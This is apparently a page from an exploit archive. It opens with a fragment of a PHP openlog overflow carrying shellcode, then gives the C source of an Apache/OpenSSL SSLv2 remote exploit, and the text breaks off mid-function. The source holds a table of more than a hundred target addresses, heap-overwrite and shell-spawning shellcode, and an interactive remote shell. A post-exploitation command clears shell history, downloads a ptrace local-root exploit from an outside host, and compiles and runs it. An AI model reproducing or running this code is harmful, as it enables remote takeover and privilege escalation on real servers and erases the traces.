$gift .= "\x53\x53\x53\x53\x42\x53\x4b\x53\x52\x51\x53\xfd\x 76\x02\x6a\x70";
$gift .= "\xfd\xb1\x14\xfd\x56\x06\xfd\xd2\x8a\xe4\xfd\x77\x 03\x6a\xaf\xdb";
$gift .= "\x06\xcc\xfd\x57\x07\x8b\xc1\x68\xfc\xfd\x34\xfd\x d0\xfd\x77\x02";
$gift .= "\x6b\x7c\xda\xe0\x70\xfd\x57\x06\x32\xd9\x51\xfd\x d3\x02\x02";
$ret = "\xb8\x9e\xe3\x77";
$nop =str_repeat("\x90", 1024);
$boomstring = $nop . $ret . $nop . $gift;
openlog($boomstring, LOG_PID, LOG_DAEMON);
// uncomment openlog(); to enable exploit... - str0ke did it already for ya.
?>
# [2004-12-28]
80 Apache OpenSSL Remote Exploit (Multiple Targets) (Open****V2.c)
/*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o Open**** Open****.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
*/
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <openssl/ssl.h>
#include <openssl/rsa.h>
#include <openssl/x509.h>
#include <openssl/evp.h>
/* update this if you add architectures */
#define MAX_ARCH 138
struct archs {
char* desc;
int func_addr; /* objdump -R /usr/sbin/httpd | grep free */
} architectures[] = {
{
"Caldera OpenLinux (apache-1.3.26)",
0x080920e0
},
{
"Cobalt Sun 6.0 (apache-1.3.12)",
0x8120f0c
},
{
"Cobalt Sun 6.0 (apache-1.3.20)",
0x811dcb8
},
{
"Cobalt Sun x (apache-1.3.26)",
0x8123ac3
},
{
"Cobalt Sun x Fixed2 (apache-1.3.26)",
0x81233c3
},
{
"Conectiva 4 (apache-1.3.6)",
0x08075398
},
{
"Conectiva 4.1 (apache-1.3.9)",
0x0808f2fe
},
{
"Conectiva 6 (apache-1.3.14)",
0x0809222c
},
{
"Conectiva 7 (apache-1.3.12)",
0x0808f874
},
{
"Conectiva 7 (apache-1.3.19)",
0x08088aa0
},
{
"Conectiva 7/8 (apache-1.3.26)",
0x0808e628
},
{
"Conectiva 8 (apache-1.3.22)",
0x0808b2d0
},
{
"Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)",
0x08095264
},
{
"Debian GNU Linux (apache_1.3.19-1)",
0x080966fc
},
{
"Debian GNU Linux (apache_1.3.22-2)",
0x08096aac
},
{
"Debian GNU Linux (apache-1.3.22-2.1)",
0x08083828
},
{
"Debian GNU Linux (apache-1.3.22-5)",
0x08083728
},
{
"Debian GNU Linux (apache_1.3.23-1)",
0x08085de8
},
{
"Debian GNU Linux (apache_1.3.24-2.1)",
0x08087d08
},
{ "Debian Linux GNU Linux 2 (apache_1.3.24-2.1)",
0x080873ac
},
{
"Debian GNU Linux (apache_1.3.24-3)",
0x08087d68
},
{
"Debian GNU Linux (apache-1.3.26-1)",
0x0080863c4
},
{
"Debian GNU Linux 3.0 Woody (apache-1.3.26-1)",
0x080863cc
},
{ "Debian GNU Linux (apache-1.3.27)",
0x0080866a3
},
{ "FreeBSD (apache-1.3.9)", 0xbfbfde00 },
{ "FreeBSD (apache-1.3.11)", 0x080a2ea8 },
{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7f58 },
{ "FreeBSD (apache-1.3.12.1.40)", 0x080a0ec0 },
{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7e7c },
{ "FreeBSD (apache-1.3.12.1.40_1)", 0x080a7f18 },
{ "FreeBSD (apache-1.3.12)", 0x0809bd7c },
{ "FreeBSD (apache-1.3.14)", 0xbfbfdc00 },
{ "FreeBSD (apache-1.3.14)", 0x080ab68c },
{ "FreeBSD (apache-1.3.14)", 0x0808c76c },
{ "FreeBSD (apache-1.3.14)", 0x080a3fc8 },
{ "FreeBSD (apache-1.3.14)", 0x080ab6d8 },
{ "FreeBSD (apache-1.3.17_1)", 0x0808820c },
{ "FreeBSD (apache-1.3.19)", 0xbfbfdc00 },
{ "FreeBSD (apache-1.3.19_1)", 0x0808c96c },
{ "FreeBSD (apache-1.3.20)", 0x0808cb70 },
{ "FreeBSD (apache-1.3.20)", 0xbfbfc000 },
{ "FreeBSD (apache-1.3.20+2.8.4)", 0x0808faf8 },
{ "FreeBSD (apache-1.3.20_1)", 0x0808dfb4 },
{ "FreeBSD (apache-1.3.22)", 0xbfbfc000 },
{ "FreeBSD (apache-1.3.22_7)", 0x0808d110 },
{ "FreeBSD (apache_fp-1.3.23)", 0x0807c5f8 },
{ "FreeBSD (apache-1.3.24_7)", 0x0808f8b0 },
{ "FreeBSD (apache-1.3.24+2.8.8)", 0x080927f8 },
{ "FreeBSD 4.6.2-Release-p6 (apache-1.3.26)", 0x080c432c },
{ "FreeBSD 4.6-Realease (apache-1.3.26)", 0x0808fdec },
{ "FreeBSD (apache-1.3.27)", 0x080902e4 },
{
"Gentoo Linux (apache-1.3.24-r2)",
0x08086c34
},
{
"Linux Generic (apache-1.3.14)",
0xbffff500
},
{
"Mandrake Linux X.x (apache-1.3.22-10.1mdk)",
0x080808ab
},
{
"Mandrake Linux 7.1 (apache-1.3.14-2)",
0x0809f6c4
},
{
"Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)",
0x0809d233
},
{
"Mandrake Linux 7.2 (apache-1.3.14-2mdk)",
0x0809f6ef
},
{
"Mandrake Linux 7.2 (apache-1.3.14) 2",
0x0809d6c4
},
{
"Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)",
0x0809ccde
},
{
"Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)",
0x0809ce14
},
{
"Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)",
0x0809d262
},
{
"Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)",
0x08083545
},
{
"Mandrake Linux 8.0 (apache-1.3.19-3)",
0x0809ea98
},
{
"Mandrake Linux 8.1 (apache-1.3.20-3)",
0x0809e97c
},
{
"Mandrake Linux 8.2 (apache-1.3.23-4)",
0x08086580
},
{ "Mandrake Linux 8.2 #2 (apache-1.3.23-4)",
0x08086484
},
{ "Mandrake Linux 8.2 (apache-1.3.24)",
0x08086665
},
{ "Mandrake Linux 9 (apache-1.3.26)",
0x0808b864
},
{
"RedHat Linux ?.? GENERIC (apache-1.3.12-1)",
0x0808c0f4
},
{
"RedHat Linux TEST1 (apache-1.3.12-1)",
0x0808c0f4
},
{
"RedHat Linux TEST2 (apache-1.3.12-1)",
0x0808c0f4
},
{
"RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)",
0x080d2c35
},
{
"RedHat Linux 4.2 (apache-1.1.3-3)",
0x08065bae
},
{
"RedHat Linux 5.0 (apache-1.2.4-4)",
0x0808c82c
},
{
"RedHat Linux 5.1-Update (apache-1.2.6)",
0x08092a45
},
{
"RedHat Linux 5.1 (apache-1.2.6-4)",
0x08092c2d
},
{
"RedHat Linux 5.2 (apache-1.3.3-1)",
0x0806f049
},
{
"RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)",
0x0808e4d8
},
{
"RedHat Linux 6.0 (apache-1.3.6-7)",
0x080707ec
},
{
"RedHat Linux 6.0 (apache-1.3.6-7)",
0x080707f9
},
{
"RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)",
0x0808fd52
},
{
"RedHat Linux 6.0 Update (apache-1.3.24)",
0x80acd58
},
{
"RedHat Linux 6.1 (apache-1.3.9-4)1",
0x0808ccc4
},
{
"RedHat Linux 6.1 (apache-1.3.9-4)2",
0x0808ccdc
},
{
"RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)",
0x0808fd5d
},
{
"RedHat Linux 6.1-fp2000 (apache-1.3.26)",
0x082e6fcd
},
{
"RedHat Linux 6.2 (apache-1.3.12-2)1",
0x0808f689
},
{
"RedHat Linux 6.2 (apache-1.3.12-2)2",
0x0808f614
},
{
"RedHat Linux 6.2 mod(apache-1.3.12-2)3",
0xbffff94c
},
{
"RedHat Linux 6.2 update (apache-1.3.22-5.6)1",
0x0808f9ec
},
{
"RedHat Linux 6.2-Update (apache-1.3.22-5.6)2",
0x0808f9d4
},
{
"Redhat Linux 7.x (apache-1.3.22)",
0x0808400c
},
{
"RedHat Linux 7.x (apache-1.3.26-1)",
0x080873bc
},
{ "RedHat Linux 7.x (apache-1.3.27)",
0x08087221
},
{
"RedHat Linux 7.0 (apache-1.3.12-25)1",
0x0809251c
},
{
"RedHat Linux 7.0 (apache-1.3.12-25)2",
0x0809252d
},
{
"RedHat Linux 7.0 (apache-1.3.14-2)",
0x08092b98
},
{
"RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)",
0x08084358
},
{
"RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)",
0x0808438c
},
{
"RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)",
0x08086e41
},
{
"RedHat Linux 7.1 (apache-1.3.19-5)1",
0x0809af8c
},
{
"RedHat Linux 7.1 (apache-1.3.19-5)2",
0x0809afd9
},
{
"RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)",
0x0808438c
},
{
"RedHat Linux 7.1-Update (1.3.22-5.7.1)",
0x08084389
},
{
"RedHat Linux 7.1 (apache-1.3.22-src)",
0x0816021c
},
{
"RedHat Linux 7.1-Update (1.3.27-1.7.1)",
0x08086ec89
},
{
"RedHat Linux 7.2 (apache-1.3.20-16)1",
0x080994e5
},
{
"RedHat Linux 7.2 (apache-1.3.20-16)2",
0x080994d4
},
{
"RedHat Linux 7.2-Update (apache-1.3.22-6)",
0x08084045
},
{
"RedHat Linux 7.2 (apache-1.3.24)",
0x80b0938
},
{
"RedHat Linux 7.2 (apache-1.3.26)",
0x08161c16
},
{
"RedHat Linux 7.2 (apache-1.3.26-snc)",
0x8161c14
},
{
"Redhat Linux 7.2 (apache-1.3.26 w/PHP)1",
0x08269950
},
{
"Redhat Linux 7.2 (apache-1.3.26 w/PHP)2",
0x08269988
},
{
"RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)",
0x08086af9
},
{
"RedHat Linux 7.3 (apache-1.3.23-11)1",
0x0808528c
},
{
"RedHat Linux 7.3 (apache-1.3.23-11)2",
0x0808525f
},
{
"RedHat Linux 7.3 (apache-1.3.27)",
0x080862e4
},
{ "RedHat Linux 8.0 (apache-1.3.27)",
0x08084c1c
},
{ "RedHat Linux 8.0-second (apache-1.3.27)",
0x0808151e
},
{ "RedHat Linux 8.0 (apache-2.0.40)",
0x08092fa4
},
{
"Slackware Linux 4.0 (apache-1.3.6)",
0x08088130
},
{
"Slackware Linux 7.0 (apache-1.3.9)",
0x080a7fc0
},
{
"Slackware Linux 7.0 (apache-1.3.26)",
0x083d37fc
},
{ "Slackware 7.0 (apache-1.3.26)2",
0x083d2232
},
{
"Slackware Linux 7.1 (apache-1.3.12)",
0x080a86a4
},
{
"Slackware Linux 8.0 (apache-1.3.20)",
0x080ae67c
},
{
"Slackware Linux 8.1 (apache-1.3.24)",
0x080b0c60
},
{
"Slackware Linux 8.1 (apache-1.3.26)",
0x080b2100
},
{
"Slackware Linux 8.1-stable (apache-1.3.26)",
0x080b0c60
},
{ "Slackware Linux (apache-1.3.27)",
0x080b1a3a
},
{
"SuSE Linux 7.0 (apache-1.3.12)",
0x0809f54c
},
{
"SuSE Linux 7.1 (apache-1.3.17)",
0x08099984
},
{
"SuSE Linux 7.2 (apache-1.3.19)",
0x08099ec8
},
{
"SuSE Linux 7.3 (apache-1.3.20)",
0x08099da8
},
{
"SuSE Linux 8.0 (apache-1.3.23)",
0x08086168
},
{
"SUSE Linux 8.0 (apache-1.3.23-120)",
0x080861c8
},
{
"SuSE Linux 8.0 (apache-1.3.23-137)",
0x080861c8
},
/* this one unchecked cause require differend shellcode */
{
"Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)",
0xfd42630
},
};
extern int errno;
int cipher;
int ciphers;
/* the offset of the local port from be beginning of the overwrite next chunk buffer */
#define FINDSCKPORTOFS 208 + 12 + 46
unsigned char overwrite_session_id_length[] =
"AAAA" /* int master key length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */
"\x70\x00\x00\x00"; /* unsigned int session id length; */
unsigned char overwrite_next_chunk[] =
"AAAA" /* int master key length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */
"AAAA" /* unsigned int session id length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session id[SSL MAX SSL SESSION ID LENGTH]; */
"AAAA" /* unsigned int sid ctx length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid ctx[SSL MAX SID CTX LENGTH]; */
"AAAA" /* int not resumable; */
"\x00\x00\x00\x00" /* struct sess cert st *sess cert; */
"\x00\x00\x00\x00" /* X509 *peer; */
"AAAA" /* long verify result; */
"\x01\x00\x00\x00" /* int references; */
"AAAA" /* int timeout; */
"AAAA" /* int time */
"AAAA" /* int compress meth; */
"\x00\x00\x00\x00" /* SSL CIPHER *cipher; */
"AAAA" /* unsigned long cipher id; */
"\x00\x00\x00\x00" /* STACK OF(SSL CIPHER) *ciphers; */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO EX DATA ex data; */
"AAAAAAAA" /* struct ssl session st *prev,*next; */
"\x00\x00\x00\x00" /* Size of previous chunk */
"\x11\x00\x00\x00" /* Size of chunk, in bytes */
"fdfd" /* Forward and back pointers */
"bkbk"
"\x10\x00\x00\x00" /* Size of previous chunk */
"\x10\x00\x00\x00" /* Size of chunk, PREV INUSE is set */
/* shellcode start */
"\xeb\x0a\x90\x90" /* jump 10 bytes ahead, land at shellcode */
"\x90\x90\x90\x90"
"\x90\x90\x90\x90" /* this is overwritten with FD by the unlink macro */
/* 72 bytes findsckcode by LSD-pl */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xe7" /* movl %esp,%edi */
"\x8d\x77\x10" /* leal 0x10(%edi),%esi */
"\x89\x77\x04" /* movl %esi,0x4(%edi) */
"\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */
"\x89\x4f\x08" /* movl %ecx,0x8(%edi) */
"\xb3\x10" /* movb $0x10,%bl */
"\x89\x19" /* movl %ebx,(%ecx) */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\xff" /* movb $0xff,%cl */
"\x89\x0f" /* movl %ecx,(%edi) */
"\x51" /* pushl %ecx */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x07" /* movb $0x07,%bl */
"\x89\xf9" /* movl %edi,%ecx */
"\xcd\x80" /* int $0x80 */
"\x59" /* popl %ecx */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x39\xd8" /* cmpl %ebx,%eax */
"\x75\x0a" /* jne <findsckcode+54> */
"\x66\xb8\x12\x34" /* movw $0x1234,%bx */
"\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */
"\x74\x02" /* je <findsckcode+56> */
"\xe2\xe0" /* loop <findsckcode+24> */
"\x89\xcb" /* movl %ecx,%ebx */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\x03" /* movb $0x03,%cl */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x3f" /* movb $0x3f,%al */
"\x49" /* decl %ecx */
"\xcd\x80" /* int $0x80 */
"\x41" /* incl %ecx */
"\xe2\xf6" /* loop <findsckcode+62> */
/* 10 byte setresuid(0,0,0); by core */
"\x31\xc9" /* xor %ecx,%ecx */
"\xf7\xe1" /* mul %ecx,%eax */
"\x51" /* push %ecx */
"\x5b" /* pop %ebx */
"\xb0\xa4" /* mov $0xa4,%al */
"\xcd\x80" /* int $0x80 */
/* bigger shellcode added by spabam */
/* "\xB8\x2F\x73\x68\x23\x25\x2F\x73\x68\xDC\x50\x68\x 2F\x62\x69"
"\x6E\x89\xE3\x31\xC0\x50\x53\x89\xE1\x04\x0B\x31\x D2\xCD\x80"
*/
/* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80"; /* int $0x80 */
/* read and write buffer*/
#define BUFSIZE 16384
/* hardcoded protocol stuff */
#define CHALLENGE_LENGTH 16
#define RC4_KEY_LENGTH 16 /* 128 bits */
#define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
/* straight from the openssl source */
#define n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1])) )),c+=2)
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s) )&0xff)),c+=2)
/* we keep all SSL2 state in this structure */
typedef struct {
int sock;
/* client stuff */
unsigned char challenge[CHALLENGE_LENGTH];
unsigned char master_key[RC4_KEY_LENGTH];
unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
/* connection id - returned by the server */
int conn_id_length;
unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
/* server certificate */
X509 *x509;
/* session keys */
unsigned char* read_key;
unsigned char* write_key;
RC4_KEY* rc4_read_key;
RC4_KEY* rc4_write_key;
/* sequence numbers, used for MAC calculation */
int read_seq;
int write_seq;
/* set to 1 when the SSL2 handshake is complete */
int encrypted;
} ssl_conn;
#define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
long getip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
/* mixter's code w/enhancements by core */
int sh(int sockfd) {
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
/* Priming commands */
strcpy(snd, COMMAND1 "\n");
write(sockfd, snd, strlen(snd));
strcpy(snd, COMMAND2 "\n");
write(sockfd, snd, strlen(snd));
/* Main command loop */
for (;;) {
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset)) {
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd)-2, stdin);
write(sockfd, snd, strlen(snd));
}
if (FD_ISSET(sockfd, &rset)) {
bzero(rcv, sizeof(rcv));
if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
printf("Good Bye!\n");
return 0;
}
if (n < 0) {
perror("read");
return 1;
}
fputs(rcv, stdout);
fflush(stdout); /* keeps output nice */
}
} /* for(;;) */
}
/* Returns the local port of a connected socket */
int get_local_port(int sock)
{
struct sockaddr_in s_in;
unsigned int namelen = sizeof(s_in);
if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) {
printf("Can't get local port: %s\n", strerror(errno));
exit(1);
}
return s_in.sin_port;
}
/* Connect to a host */
int connect_host(char* host, int port)
{
struct sockaddr_in s_in;
int sock;
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = getip(host);
s_in.sin_port = htons(port);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {
printf("Could not create a socket\n");
exit(1);
}
if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
exit(1);
}
return sock;
}
/* Create a new ssl conn structure and connect to a host */
ssl_conn* ssl_connect_host(char* host, int port)
{
ssl_conn* ssl;
if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) {
printf("Can't allocate memory\n");
exit(1);
}
/* Initialize some values */
ssl->encrypted = 0;
ssl->write_seq = 0;
ssl->read_seq = 0;
ssl->sock = connect_host(host, port);
return ssl;
}
/* global buffer used by the ssl result() */
char res_buf[30];
/* converts an SSL error code to a string */
char* ssl_error(int code) {
switch (code) {
case 0x00: return "SSL2 PE UNDEFINED ERROR (0x00)";
case 0x01: return "SSL2 PE NO CIPHER (0x01)";
case 0x02: return "SSL2 PE NO CERTIFICATE (0x02)";
case 0x04: return "SSL2 PE BAD CERTIFICATE (0x03)";
case 0x06: return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)";
default:
sprintf(res_buf, "%02x", code);
return res_buf;
}
}
/* read len bytes from a socket. boring. */
int read_data(int sock, unsigned char* buf, int len)
{
int l;
int to_read = len;
do {
if ((l = read(sock, buf, to_read)) < 0) {
printf("Error in read: %s\n", strerror(errno));
exit(1);
}
to_read -= len;
} while (to_read > 0);
return len;
}
/* reads an SSL packet and decrypts it if necessery */
int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size)
{
int rec_len, padding;
read_data(ssl->sock, buf, 2);
if ((buf[0] & 0x80) == 0) {
/* three byte header */
rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
read_data(ssl->sock, &buf[2], 1);
padding = (int)buf[2];
}
else {
/* two byte header */
rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
padding = 0;
}
if ((rec_len <= 0) || (rec_len > buf_size)) {
printf("read_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
exit(1);
}
read_data(ssl->sock, buf, rec_len);
if (ssl->encrypted) {
if (MD5_DIGEST_LENGTH + padding >= rec_len) {
if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
/* the server didn't switch to encryption due to an error */
return 0;
}
else {
printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n", rec_len);
exit(1);
}
}
/* decrypt the encrypted part of the packet */
RC4(ssl->rc4_read_key, rec_len, buf, buf);
/* move the decrypted message in the beginning of the buffer */
rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
}
if (buf[0] == SSL2_MT_ERROR) {
if (rec_len != 3) {
printf("Malformed server error message\n");
exit(1);
}
else {
return 0;
}
}
return rec_len;
}
/* send an ssl packet, encrypting it if ssl->encrypted is set */
void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len)
{
unsigned char buf[BUFSIZE];
unsigned char* p;
int tot_len;
MD5_CTX ctx;
int seq;
if (ssl->encrypted)
tot_len = rec_len + MD5_DIGEST_LENGTH; /* RC4 needs no padding */
else
tot_len = rec_len;
if (2 + tot_len > BUFSIZE) {
printf("send_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
exit(1);
}
p = buf;
s2n(tot_len, p);
buf[0] = buf[0] | 0x80; /* two byte header */
if (ssl->encrypted) {
/* calculate the MAC */
seq = ntohl(ssl->write_seq);
MD5_Init(&ctx);
MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
MD5_Update(&ctx, rec, rec_len);
MD5_Update(&ctx, &seq, 4);
MD5_Final(p, &ctx);
p+=MD5_DIGEST_LENGTH;
memcpy(p, rec, rec_len);
/* encrypt the payload */
RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
}
else {
memcpy(p, rec, rec_len);
}
send(ssl->sock, buf, 2 + tot_len, 0);
/* the sequence number is incremented by both encrypted and plaintext packets
*/
ssl->write_seq++;
}
/* Send a CLIENT HELLO message to the server */
void send_client_hello(ssl_conn *ssl)
{
int i;
unsigned char buf[BUFSIZE] =
"\x01" /* client hello msg */
"\x00\x02" /* client version */
"\x00\x18" /* cipher specs length */
"\x00\x00" /* session id length */
"\x00\x10" /* challenge length */
"\x07\x00\xc0\x05\x00\x80\x03\x00" /* cipher specs data */
"\x80\x01\x00\x80\x08\x00\x80\x06"
"\x00\x40\x04\x00\x80\x02\x00\x80"
""; /* session id data */
/* generate CHALLENGE LENGTH bytes of challenge data */
for (i = 0; i < CHALLENGE_LENGTH; i++) {
ssl->challenge[i] = (unsigned char) (rand() >> 24);
}
memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
}
/* Get a SERVER HELLO response from the server */
void get_server_hello(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
unsigned char *p, *end;
int len;
int server_version, cert_length, cs_length, conn_id_length;
int found;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (len < 11) {
printf("get_server_hello: Packet too short (len = %d)\n", len);
exit(1);
}
p = buf;
if (*(p++) != SSL2_MT_SERVER_HELLO) {
printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]);
exit(1);
}
if (*(p++) != 0) {
printf("get_server_hello: SESSION-ID-HIT is not 0\n");
exit(1);
}
if (*(p++) != 1) {
printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n");
exit(1);
}
n2s(p, server_version);
if (server_version != 2) {
printf("get_server_hello: Unsupported server version %d\n", server_version);
exit(1);
}
n2s(p, cert_length);
n2s(p, cs_length);
n2s(p, conn_id_length);
if (len != 11 + cert_length + cs_length + conn_id_length) {
printf("get_server_hello: Malformed packet size\n");
exit(1);
}
/* read the server certificate */
ssl->x509 = NULL;
ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
if (ssl->x509 == NULL) {
printf("get server hello: Cannot parse x509 certificate\n");
exit(1);
}
if (cs_length % 3 != 0) {
printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n");
exit(1);
}
found = 0;
for (end=p+cs_length; p < end; p += 3) {
if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80))
found = 1; /* SSL CK RC4 128 WITH MD5 */
}
if (!found) {
printf("get server hello: Remote server does not support 128 bit RC4\n");
exit(1);
}
if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) {
printf("get server hello: CONNECTION-ID-LENGTH is too long\n");
exit(1);
}
/* The connection id is sent back to the server in the CLIENT FINISHED packet */
ssl->conn_id_length = conn_id_length;
memcpy(ssl->conn_id, p, conn_id_length);
}
/* Send a CLIENT MASTER KEY message to the server */
void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
int encrypted_key_length, key_arg_length, record_length;
unsigned char* p;
int i;
EVP_PKEY *pkey=NULL;
unsigned char buf[BUFSIZE] =
"\x02" /* client master key message */
"\x01\x00\x80" /* cipher kind */
"\x00\x00" /* clear key length */
"\x00\x40" /* encrypted key length */
"\x00\x08"; /* key arg length */
p = &buf[10];
/* generate a 128 byte master key */
for (i = 0; i < RC4_KEY_LENGTH; i++) {
ssl->master_key[i] = (unsigned char) (rand() >> 24);
}
pkey=X509_get_pubkey(ssl->x509);
if (!pkey) {
printf("send client master key: No public key in the server certificate\n");
exit(1);
}
if (pkey->type != EVP_PKEY_RSA) {
printf("send client master key: The public key in the server certificate is not a RSA key\n");
exit(1);
}
/* Encrypt the client master key with the server public key and put it in the packet */
encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING);
if (encrypted_key_length <= 0) {
printf("send client master key: RSA encryption failure\n");
exit(1);
}
p += encrypted_key_length;
if (key_arg_overwrite) {
/* These 8 bytes fill the key arg array on the server */
for (i = 0; i < 8; i++) {
*(p++) = (unsigned char) (rand() >> 24);
}
/* This overwrites the data following the key arg array */
memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
key_arg_length = 8 + key_arg_overwrite_len;
}
else {
key_arg_length = 0; /* RC4 doesn't use KEY-ARG */
}
p = &buf[6];
s2n(encrypted_key_length, p);
s2n(key_arg_length, p);
record_length = 10 + encrypted_key_length + key_arg_length;
send_ssl_packet(ssl, buf, record_length);
ssl->encrypted = 1;
}
void generate_key_material(ssl_conn* ssl)
{
unsigned int i;
MD5_CTX ctx;
unsigned char *km;
unsigned char c='0';
km=ssl->key_material;
for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
MD5_Init(&ctx);
MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
MD5_Update(&ctx,&c,1);
c++;
MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
MD5_Final(km,&ctx);
km+=MD5_DIGEST_LENGTH;
}
}
void generate_session_keys(ssl_conn* ssl)
{
generate_key_material(ssl);
ssl->read_key = &(ssl->key_material[0]);
ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
}
void get_server_verify(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
